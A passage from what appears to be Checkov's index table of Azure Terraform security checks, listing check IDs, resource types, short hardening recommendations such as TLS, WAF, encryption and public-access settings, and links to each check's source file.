Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1314 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1315 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1316 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1317 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | -| 1318 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1319 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1320 | CKV_AZURE_81 | resource | 
azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | -| 1321 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | -| 1322 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | -| 1323 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | -| 1324 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | -| 1325 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | -| 1326 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | 
[AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | -| 1327 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1328 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1329 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1330 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | -| 1331 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | -| 1332 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1333 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | 
[VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1334 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | -| 1335 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1336 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1337 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 1338 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | -| 1339 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1340 | CKV_AZURE_97 | 
resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1341 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | -| 1342 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | -| 1343 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | -| 1344 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | -| 1345 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | -| 1346 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | 
[DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | -| 1347 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | -| 1348 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | -| 1349 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | -| 1350 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | -| 1351 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | -| 1352 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | -| 1353 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault 
enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | -| 1354 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | -| 1355 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | -| 1356 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | -| 1357 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | -| 1358 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | -| 1359 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | -| 1360 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | 
[AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | -| 1361 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | -| 1362 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | -| 1363 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1364 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1365 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | -| 1366 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | -| 1367 | CKV_AZURE_123 | resource | 
azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | -| 1368 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | -| 1369 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | -| 1370 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | -| 1371 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | -| 1372 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | -| 1373 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | 
Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | -| 1374 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | -| 1375 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | -| 1376 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | -| 1377 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | -| 1378 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | -| 1379 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | -| 1380 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | -| 1381 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | -| 1382 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | -| 1383 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | -| 1384 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | -| 1385 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | -| 1386 | CKV_AZURE_142 | resource | 
azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | -| 1387 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | -| 1388 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | -| 1389 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1390 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1391 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1392 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | 
[FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1393 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1394 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1395 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | -| 1396 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | -| 1397 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | -| 1398 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 
1399 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1400 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | -| 1401 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | -| 1402 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | -| 1403 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1404 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1405 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | 
[AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1406 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | -| 1407 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | -| 1408 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | -| 1409 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | -| 1410 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | -| 1411 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | 
[FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1412 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1413 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1414 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1415 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | -| 1416 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | -| 1417 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. 
